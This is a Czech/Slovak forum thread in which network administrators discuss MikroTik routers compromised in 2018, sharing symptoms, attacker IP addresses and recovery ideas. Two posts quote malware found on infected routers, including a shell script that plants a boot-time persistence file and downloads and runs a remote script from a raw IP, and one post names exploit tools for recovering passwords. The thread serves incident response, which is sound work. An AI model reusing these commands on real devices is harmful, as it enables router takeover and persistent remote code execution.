MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

Návody a problémy s konfigurací.
mpcz
Příspěvky: 1945
Registrován: 12 years ago

Re: MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

Příspěvekod mpcz » 1 week ago

A v seznamu příkazů v helpu je? mpcz, 3.jul.2018
0 x

Dalibor Toman
Příspěvky: 1134
Registrován: 5 years ago

Příspěvekod Dalibor Toman » 1 week ago

Dalibor Toman píše:
mpcz píše:to Dalibor Toman: Ok, něco je asi špatně, BB mám stále v. 1.0. Fdisk tam nevidím. Dalo by se prosím ověřit, jestli tam opravdu je? A jaká verze/datum BB tam má svítit? Dík, mpcz, 3.jul.2018


cast povelu je mampovana na original busybox a cast na novy busybox_p.
po spusteni busybox_p vidis seznam implementovanycvh povelu. Pokud tohle funguje a spusteni fdisku ne tak se napovedlo naaliasovani tech povelu

Kód: Vybrat vše

# fdisk
BusyBox v1.21.1 (2013-07-08 10:56:01 CDT) multi-call binary.
Usage: fdisk [-ul] [-C CYLINDERS] [-H HEADS] [-S SECTORS] [-b SSZ] DISK
Change partition table
        -u              Start and End are in sectors (instead of cylinders)
        -l              Show partition table for each DISK, then exit
        -b 2048         (for certain MO disks) use 2048-byte sectors
        -C CYLINDERS    Set number of cylinders/heads/sectors
        -H HEADS        -S SECTORS

kdys spustim samotny busybox tak hlasi verzi 1.00


zkousel jsem hledat partition tabulky na /dev/mtdXXX ale nikde zadna neni. Tak nevim jak to je s tou flashkou udelane...
0 x

Dalibor Toman
Příspěvky: 1134
Registrován: 5 years ago

Příspěvekod Dalibor Toman » 1 week ago

mpcz píše:A v seznamu příkazů v helpu je? mpcz, 3.jul.2018

je, pokud nejde spustit samotny fdisk zkus:
busybox_p fdisk

koukam, ze se mi ty prispevky nejak podarilo domotat (misto editace jsem pridal dalsi ve kterem jsem to snad vysvetlil).
0 x

Uživatelský avatar
hapi
Příspěvky: 11171
Registrován: 10 years ago
Kontaktovat uživatele:

Příspěvekod hapi » 1 week ago

mpcz píše:to Hapi: A v jakém stavu bylo zabezpečení / verze ROS? Dík, mpcz, 3.jul.2018


ve špatnym. 6.37.3 nebo co a vše otevřený. Aktuálně vše otevřený s 6.42.5 tak se uvidí.
0 x

mpcz
Příspěvky: 1945
Registrován: 12 years ago

Příspěvekod mpcz » 1 week ago

to Dalibor Toman: asi ano, protože už mi to docvaklo. To je teda děs, BB píše v 1.00 ale jinde něco jiného. Ten fdisk tam opravdu je a funguje. Dík, mpcz 3.jul.2018
0 x

tulo
Příspěvky: 22
Registrován: 10 years ago

Příspěvekod tulo » 1 week ago

Takze na sieti jeden zabudnuty stary mikrotik s presmerovanou verejnou IP... Prihlásený par dni dozadu niekto cudzí. Čiže heslo odhalené, updatol som to na najnovšiu verziu. V skriptoch bol urobený skript čo vyrobil súbor autosupout1.rif a následne ho scheduler posielal niekam:

​:if ([/file find name=autosupout1.rif]="") do={
:local ssip [:resolve jt.25u.com server=8.8.8.8]
/tool fetch url="http://$ssip:81/autosupout1.rif" dst-path=autosupout1.rif
}
execute [/file get autosupout1.rif contents]
0 x

Uživatelský avatar
hapi
Příspěvky: 11171
Registrován: 10 years ago
Kontaktovat uživatele:

Příspěvekod hapi » 1 week ago

to ale neni celí ne? tohle nevytvoří supout, jenom pokud existuje tak ho někam pošle, pokud neexistuje tak nic. Nemělo to nějaký opakování? chápal bych že to nechal udělat a dal tam scheduler kterej ho pošle až bude hotovej což u rbček může trvat dost dlouho.

Podivnej je ale poslední řádek? co má vůbec udělat?
0 x

tulo
Příspěvky: 22
Registrován: 10 years ago

Příspěvekod tulo » 1 week ago

ten skript som hlupak zmazal...
Bol tam skript, ktorý vyrobil po reboote autosupout1.rif a ten sa sám niekam odoslal pomocou scheduleru.
Zmazal som skript, zmazal som scheduler a zmenil heslo.
V logu bolo vidieť, že bol odoslaný súbor autosupout1.rif
0 x

vencakubik
Příspěvky: 42
Registrován: 10 years ago
Kontaktovat uživatele:

Příspěvekod vencakubik » 1 week ago

Dnes jsem objevil dva případy napadení Mikrotika, kdy to změnilo DNS jak v IP/DNS tak i v nastavením DHCP serveru v networks. Nic víc to zatím neudělalo, není žádná nová partition, žádný skript.
Mám log z jakých IP adres příšly útoky:
89.248.162.169
125.93.148.78
0 x

mpcz
Příspěvky: 1945
Registrován: 12 years ago

Příspěvekod mpcz » 1 week ago

Ano, to už je klasika. A jako vždy tradiční otázka: verze (od kdy), povolené IP services, filtr na IP správy, atd. ... A z čeho prosím usuzuješ, že tam není, to co píšeš, že tam není? mpcz, 08.jul.2018
0 x

vencakubik
Příspěvky: 42
Registrován: 10 years ago
Kontaktovat uživatele:

Příspěvekod vencakubik » 1 week ago

# rm $0
exec 3>&-
exec 4>&-
exec 5>&-
exec 6>&-
exec 7>&-
exec 8>&-
exec 9>&-
rm /ram/winbox.idx
mkdir /flash/etc/rc.d
mkdir /flash/etc/rc.d/run.d
echo '#!/bin/bash' > /flash/etc/rc.d/run.d/S99own
echo "echo 'usleep 100000000;/flash/rw/store/wget http://141.105.64.212/36/a.sh -O /tmp/a.sh;/bin/bash /tmp/a.sh &' > /tmp/o.sh" >> /flash/etc/rc.d/run.d/S99own
echo "/bin/bash /tmp/o.sh &" >> /flash/etc/rc.d/run.d/S99own
chmod 777 /flash/etc/rc.d/run.d/S99own
mv /flash/rw/pckg/fileinfo /flash/rw/store/wget
chmod 777 /flash/rw/store/wget
/flash/rw/store/wget http://141.105.64.212/36/a.sh -O /tmp/a.sh
bash /tmp/a.sh &

Skript s názvem checkupdate uložený ve files.
0 x

mpcz
Příspěvky: 1945
Registrován: 12 years ago

Příspěvekod mpcz » 6 days ago

No to už klasika není, asi bych nebyl sám, kdo by rád k tomu nějaký komentář. A také i tu verzi, povolené porty atd. Děkuji. mpcz, 9.jul.2018
0 x

puhy
Příspěvky: 88
Registrován: 6 years ago
Bydliště: Choceň
Kontaktovat uživatele:

Příspěvekod puhy » 6 days ago

Dá se nějak dostat do MK kde ten vir změnil heslo?
0 x
Jan Půhoný

http://www.puhy.net- připojení k internetu a VOIP telefonování v Chocni a okolí
https://www.puhy.cz - spolehlivý obchod s elektronikou
http://www.gsm-spinac.cz - ovládejte spotřebiče mobilem

Dalibor Toman
Příspěvky: 1134
Registrován: 5 years ago

Příspěvekod Dalibor Toman » 6 days ago

puhy píše:Dá se nějak dostat do MK kde ten vir změnil heslo?

zkusit WinboxExploit ci MacServerExploit, zda z nej to heslo vymami. Pokud tam je vulnerable verze ROSU, pak by to mohlo vyjit (pokud firewall dovoli). Ale uz jsem videl, ze jmeno/heslo ziskat slo ale prihlaseni pomoci nej nefungovalo
0 x

mpcz
Příspěvky: 1945
Registrován: 12 years ago

Příspěvekod mpcz » 6 days ago

Základní předpoklad je, stroj nevypínat. U všech strojů, které měly změněné heslo, došlo PO znovupřipojení na napájení k upgrade verze, (na 6.42rc1), z čehož usuzuji, že to asi nepůjde. Bylo by zajímavé zjistit, proč je stroj zaheslovaný a nadále správně funguje. mpcz, 9.jul.2018
0 x


Zpět na „Konfigurace“

Kdo je online

Uživatelé prohlížející si toto fórum: Google [Bot] a 5 hostů